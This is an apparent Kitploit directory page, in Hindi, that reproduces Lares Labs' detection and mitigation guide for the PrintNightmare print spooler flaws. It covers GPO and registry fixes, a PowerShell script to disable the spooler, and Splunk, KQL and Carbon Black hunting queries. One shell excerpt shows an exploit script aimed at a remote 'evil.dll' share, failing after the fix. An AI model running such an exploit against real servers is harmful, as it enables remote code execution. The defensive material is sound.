Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2021-1675 — CVE-2021-1675 पता लगाने की जानकारी | Kitploit
उपकरण/GitHubGitHub/laresllc/cve-2021-1675
विशेषाधिकार वृद्धिभेद्यता विश्लेषणशोषणफोरेंसिकलर्निंग और शिक्षाघटना प्रतिक्रियाचयनित संसाधन
GitHublaresllc/cve-2021-1675

CVE-2021-1675

CVE-2021-1675 पता लगाने की जानकारी

रिपॉजिटरी देखें
2143843 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Lares Labs से: CVE-2021-1675 और CVE-2021-34527 के लिए पहचान एवं सुधार जानकारी

🚨 पैच जारी:

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527

पैच को RCE को ठीक करने की पुष्टि की गई है, हालांकि स्थानीय विशेषाधिकार वृद्धि को अभी तक पैच नहीं किया गया प्रतीत होता है। इसलिए नीचे सूचीबद्ध समाधान अभी भी अनुशंसित हैं।

इस रिपॉजिटरी में CVE-2021-1675 और CVE-2021-34527 हमले का एक EVTX नमूना है, साथ ही एक न्यूनतम Sysmon कॉन्फ़िगरेशन फ़ाइल भी है जिसका उपयोग प्रासंगिक टेलीमेट्री उत्पन्न करने के लिए किया जा सकता है।

कृपया ध्यान दें कि इन नियमों को दरकिनार किया जा सकता है - कृपया उचित रूप से पैच करें और डोमेन नियंत्रकों पर प्रिंटर स्पूलर सेवा को अक्षम करें।

कृपया उत्पादन में रोलआउट करने से पहले सभी अनुशंसित सुधारों का परीक्षण करें, क्योंकि इन सुदृढ़ीकरण परिवर्तनों के परिणामस्वरूप अनपेक्षित परिणाम हो सकते हैं। हमने इस रिपॉजिटरी की सामग्री और पाई गई जानकारी की व्याख्या करते हुए एक ब्लॉग पोस्ट लिखा है। यहाँ: https://labs.lares.com/detection-and-mitigation-printnightmare/

Marcello द्वारा भेद्यता जांच https://twitter.com/byt3bl33d3r

  • https://twitter.com/byt3bl33d3r/status/1412798525323157504

  • https://github.com/byt3bl33d3r/ItWasAllADream

प्रवाह चार्ट

Benjamin Delpy का धन्यवाद, इस मुद्दे की शोषण क्षमता पर एक अद्यतन प्रवाह चार्ट है, यह निर्धारित करने के लिए कि क्या आपके सिस्टम संभावित रूप से असुरक्षित हैं।

ऊपर प्रवाह चार्ट में दिखाए गए सुधार

  1. GPO: Security Settings -> System Services -> Print Spooler -> Disable
    1. Registry: HKLM\SYSTEM\CurrentControlSet\Services\Spooler\Start = 4
  2. GPO: Computer Configuration -> Administrative Templates -> Printers -> Allow Print Spooler to accept client connections - > Disable
    1. Registry: HKLM\Software\Policies\Microsoft\Windows NT\Printers\RegisterSpoolerRemoteRpcEndPoint = 2
  3. GPO: Printers -> Point and Print Restrictions -> Security Prompts -> When installing drivers for a new connection -> Show warning and elevation prompt
    1. Registry: HKLM\Software\Policies\Microsoft\Windows NT\Printers\PointAndPrint = 0
  4. Registry: HKLM\SOFTWARE\Microsoft\Windows\CurrrentVersion\Policies\System\EnableLUA = 1

समाधान सुधार

माइक्रोसॉफ्ट द्वारा जून 2021 में जारी किया गया पैच CVE-2021-1675 को पैच करता है, लेकिन दुर्भाग्य से यह PrintNightmare (CVE-2021-34527) के रूप में जानी जाने वाली समस्या को ठीक नहीं करता है, इसलिए प्रिंटर स्पूलर सेवा को अक्षम करके एक समाधान लागू किया जा सकता है। यहाँ GPO और PowerShell दोनों पर ऐसा करने का तरीका बताया गया है। यह पुष्टि की गई है कि GPO MS-RPRN RpcAddPrinterDriverEx फ़ंक्शन और Win32 AddPrinterDriverEx फ़ंक्शन दोनों को ठीक करता है, जिसका SharpPrintNightmare उपयोग करता है।

GPO

निम्नलिखित GPO को स्पूलर के लिए क्लाइंट कनेक्शन को अस्वीकार करने के लिए सेट किया जा सकता है, जो एक संभावित समाधान है जहां स्पूलर सेवा को पूरी तरह से अक्षम करना एक विकल्प नहीं हो सकता है। इसका प्रयोगशाला वातावरण में डोमेन नियंत्रकों और एंडपॉइंट्स (W7/W10) के खिलाफ परीक्षण किया गया है और उपयोगकर्ता अभी भी प्रिंटर जोड़/हटा सकते हैं और प्रिंट कर सकते हैं, हालांकि यह एक्सप्लॉइट को काम करने से रोकता है। नोट: यह भी समझा जाता है कि यह GPO CVE-2021-34527 को भी ठीक करता है जैसा कि Microsoft के भेद्यता पृष्ठ पर उल्लेख किया गया है।

Computer Configuration -> Administrative Templates -> Printers -> Allow Print Spooler to accept client connections इसे Disabled पर सेट करें:

फिर प्रभावित होस्ट पर स्पूलर सेवा को पुनरारंभ करें। सब ठीक रहने पर, एक्सप्लॉइट तक पहुंच से वंचित कर दिया जाएगा:

root@kitploit:~
./CVE-2021-1675.py lares.labs/[email protected] '\\certer.lares.labs\share\evil.dll'                                                                                    1 ⨯
Password:
[*] Try 1...
[*] Connecting to ncacn_np:192.168.1.157[\PIPE\spoolss]
[-] Connection Failed

प्री-विंडोज 2000 संगत पहुंच से प्रमाणित उपयोगकर्ताओं को हटाना

एक अन्य सुधार/समाधान प्री-विंडोज 2000 संगत पहुंच से प्रमाणित उपयोगकर्ताओं को हटाना है, जैसा कि Dirk-jan द्वारा खोजा गया।

सुनिश्चित करें कि "Authenticated Users" समूह "Pre-Windows 2000 Compatible Access group" के सदस्य नहीं हैं। (डिफ़ॉल्ट रूप से, ये समूह वर्तमान विंडोज़ संस्करणों में शामिल नहीं हैं।) जैसा कि नीचे स्क्रीनशॉट में दिखाया गया है, कोई सदस्य नहीं होना चाहिए:

यदि ऐसा करने के तरीके के बारे में संदेह है, तो निम्नलिखित चरणों का पालन किया जा सकता है:

  1. "Active Directory Users and Computers" खोलें (विभिन्न मेनू से उपलब्ध या "dsa.msc" चलाएँ)।
  2. बाएँ फलक में समीक्षा किए जा रहे डोमेन का विस्तार करें और "Builtin" कंटेनर चुनें।
  3. दाएँ फलक में "Pre-Windows 2000 Compatible Access" समूह पर डबल-क्लिक करें।
  4. "Members" टैब चुनें।
  5. यदि "Anonymous Logon", "Authenticated Users" या "Everyone" समूह सदस्य हैं, तो प्रत्येक को चुनें और "Remove" पर क्लिक करें।

PowerShell

डोमेन से सभी DC को खींचने के लिए ADDomainController का उपयोग करने के लिए 0gtweet का स्क्रिप्ट अनुकूलित किया गया

root@kitploit:~
# the script STOP and DISABLES Print Spooler service (aka #PrintNightmare) on each server from the list below IF ONLY DEFAULT PRINTERS EXIST.
# revert if you need: go to services.msc, find the "print spooler" service, change startup type to "automatic" and start the service.
# Source: https://github.com/gtworek/PSBits/blob/master/Misc/StopAndDisableDefaultSpoolers.ps1
#
# Requirements RSAT
# Get-Module -Name ActiveDirectory
# Import-Module -Name ActiveDirectory

$computers = Get-ADDomainController -filter * | %{ $_.name }

foreach ($computer in $computers)
{
    Write-Host "Processing $computer ..." 
    $service = Get-Service -ComputerName $computer -Name Spooler -ErrorAction SilentlyContinue
    if (!$service)
    {
        Write-Host "Cannot connect to Spooler Service on $computer. Skipping." -ForegroundColor Yellow
        continue
    }
    if ($service.Status -ne "Running")
    {
        Write-Host ("Service status is: """ + $service.Status + """. Skipping.") -ForegroundColor Yellow
        continue
    }
    $printers = (Get-WmiObject -class Win32_printer -ComputerName $computer)
    if (!$printers)
    {
        Write-Host "Cannot enumerate printers. Skipping." -ForegroundColor Yellow
        continue
    }

    $disableSpooler = $true
    foreach ($DriverName in ($printers.DriverName))
    {
        if (($DriverName -notmatch 'Microsoft XPS Document Writer') -and ($DriverName -notmatch 'Microsoft Print To PDF'))
        {
            Write-Host "  Printer found: $DriverName" -ForegroundColor Green
            $disableSpooler = $false
        }
    }
    if ($disableSpooler)
    {
        Write-Host "Only default printers found. Stopping and disabling spooler..." -ForegroundColor DarkCyan
        (Get-Service -ComputerName $computer -Name Spooler) | Stop-Service -Verbose
        Set-Service -ComputerName $computer -Name Spooler -StartupType Disabled -Verbose

    }
    else
    {
        Write-Host "Non-default printers found. Skipping." -ForegroundColor Green
    }
}

Sysmon Config File

दिया गया Sysmon कॉन्फ़िगरेशन CVE-2021-1675.xml फ़ाइल Sysmon Config Pusher के साथ स्थापित की जा सकती है: https://github.com/LaresLLC/SysmonConfigPusher

Splunk Queries

root@kitploit:~
index=sysmon EventCode=7 Image="C:\\Windows\\System32\\spoolsv.exe" NOT (Signature="Microsoft Windows" SignatureStatus=Valid)
| stats values(ImageLoaded),values(TargetObject),values(Details),values(TargetFilename)

वैकल्पिक दृष्टिकोण

Print Spooler शोषण के लिए शिकार करने का एक सामान्य तरीका पेलोड DLL के लोड होने के कारण प्रिंट स्पूलर द्वारा उत्पन्न त्रुटि को देखना है। यह spoolsv.exe द्वारा WerFault.exe के स्पॉनिंग या प्रिंट स्पूलर सेवा के अप्रत्याशित समाप्ति को दर्शाने वाले Event ID 7031 की पीढ़ी को देखकर किया जा सकता है।

वैकल्पिक Splunk Query

root@kitploit:~
((index=sysmon EventCode=1 
ParentImage="C:\\Windows\\System32\\spoolsv.exe" Image="C:\\Windows\\System32\\WerFault.exe") 
OR (index=windows Channel=System EventCode=7031 
Message="The Print Spooler service terminated unexpectedly"))

अतिरिक्त दृष्टिकोण

cube0x0 के कार्यान्वयन के शोषण के कई परीक्षणों के बाद, एक अतिरिक्त कलाकृति पाई गई: Event ID 5145 जिसमें Share Name: \\*\IPC$ और Relative Target Name: spoolss है। इस दृष्टिकोण का लाभ यह है कि आप हमले को अंजाम देने के लिए उपयोग किए जाने वाले स्रोत IP (Source Address) और खाता (Security ID या Account Name) देख सकते हैं। वास्तविक प्रिंट सर्वर से झूठी सकारात्मकता हो सकती है, लेकिन उन्हें होस्टनाम और Access Mask द्वारा फ़िल्टर किया जा सकता है। अन्य झूठी सकारात्मकता हो सकती है जिन्हें hostname-username-access mask के संयोजन से फ़िल्टर किया जा सकता है।

Splunk Query

root@kitploit:~
index=windows_security EventCode=5145 Share_Name="\\\\*\\IPC$" Relative_Target_Name=spoolss

Olaf Hartong के माध्यम से Sentinel / MDE के लिए KQL Query

root@kitploit:~
let serverlist=DeviceInfo
| where DeviceType != "Workstation"
| distinct DeviceId;
let suspiciousdrivers=DeviceImageLoadEvents
| where DeviceId in (serverlist)
| where FolderPath startswith @"c:\windows\system32\spool\drivers"
| distinct SHA1
| invoke FileProfile(SHA1, 1000) 
| where GlobalPrevalence < 50 and IsRootSignerMicrosoft != 1 and SignatureState != "SignedValid";
suspiciousdrivers
| join kind=inner (DeviceImageLoadEvents
| where DeviceId in (serverlist)
| where FolderPath startswith @"c:\windows\system32\spool\drivers") on SHA1
| where InitiatingProcessFileName != "ccmexec.exe"

स्रोत: https://twitter.com/olafhartong/status/1410229699993874442

Zeek Observations

उपकरण उपयोग किया गया: https://github.com/cisagov/Malcolm

DLL का फ़ाइल स्थानांतरण:

"हमला करने वाली" मशीन से NTLM प्रमाणीकरण:

प्रासंगिक RPC कॉल:

🟢 PCAP File Available

🟢 Zeek dce_rpc.log

CVE-2021-1675 के लिए कार्बन ब्लैक हंटिंग क्वेरी

स्रोत: https://github.com/mrezqi/CVE-2021-1675_CarbonBlack_HuntingQuery/blob/main/README.md

  • 1 POC कोड का पता लगाने पर सिग्मा नियम पर आधारित
root@kitploit:~
filemod_name:c\:\\windows\\system32\\spool\\drivers\\x64\\3\\old\\1\\123
  • 2 POC कोड का पता लगाने पर सिग्मा नियम पर आधारित
root@kitploit:~
(modload_name:c\:\\windows\\system32\\spool\\drivers\\x64\\3* OR modload_name:c\:\\windows\\system32\\spool\\drivers\\x64\\3\\old*) AND parent_cmdline:spoolsv\.exe
  • 3 POC कोड का पता लगाने पर सिग्मा नियम पर आधारित
root@kitploit:~
(modload_name:c\:\\windows\\system32\\spool\\drivers\\x64\\3* OR modload_name:c\:\\windows\\system32\\spool\\drivers\\x64\\3\\old*) AND process_name:spoolsv\.exe
  • 4 फ़ाइल ईवेंट का पता लगाना (अहस्ताक्षरित), इसे अपने आधारभूत के अनुसार समायोजित करें। मैंने यहाँ जानबूझकर ड्राइवर पथ निर्दिष्ट नहीं किया क्योंकि शोषण और पोस्ट-शोषण अभी भी थोड़ा अस्पष्ट है। इसे अपने आधारभूत (ज्ञात हैश, आदि) के अनुसार समायोजित करना सुनिश्चित करें।
root@kitploit:~
process_name:spoolsv\.exe AND NOT filemod_publisher_state:FILE_SIGNATURE_STATE_SIGNED
  • 5 फ़ाइल ईवेंट का पता लगाना (गैर-MS द्वारा हस्ताक्षरित), इसे अपने आधारभूत के अनुसार समायोजित करें
root@kitploit:~
process_name:spoolsv\.exe AND filemod_publisher_state:FILE_SIGNATURE_STATE_SIGNED AND NOT filemod_publisher:"Microsoft Windows*"

संदर्भ

हमलों और हंटिंग क्वेरी का संदर्भ देने वाले ट्वीटर पोस्ट

  • https://twitter.com/ionstorm/status/1410258694386880518
  • https://twitter.com/dez_/status/1410298162548559875
  • https://twitter.com/markus_neis/status/1410255678996942854
  • https://twitter.com/cyb3rops/status/1410250996362715137
  • https://twitter.com/gentilkiwi/status/1410066827590447108
  • https://twitter.com/wdormann/status/1410198834970599425
  • https://twitter.com/NathanMcNulty/status/1410289115354914820
  • https://twitter.com/mvelazco/status/1410291741241102338
  • https://twitter.com/StanHacked/status/1410527329839980547
  • https://twitter.com/_dirkjan/status/1410618720460754947
  • https://github.com/mrezqi/CVE-2021-1675_CarbonBlack_HuntingQuery
  • https://twitter.com/cube0x0/status/1411364227089117185

Benjamin Delpy के माध्यम से डोमेन नियंत्रक बनाम गैर-डोमेन नियंत्रक अवलोकन:

  • https://twitter.com/gentilkiwi/status/1410614489167269892

Stan Hegt of Outflank द्वारा एक बहुत ही उपयोगी प्रवाह चार्ट

  • https://twitter.com/StanHacked/status/1410922404252168196

Microsoft से नया CVE असाइनमेंट:

  • https://twitter.com/msftsecresponse/status/1410768945590636548

SANS ICS डायरी:

  • https://isc.sans.edu/forums/diary/CVE20211675+Incomplete+Patch+and+Leaked+RCE+Exploit/27588/
टूल डाउनलोड करें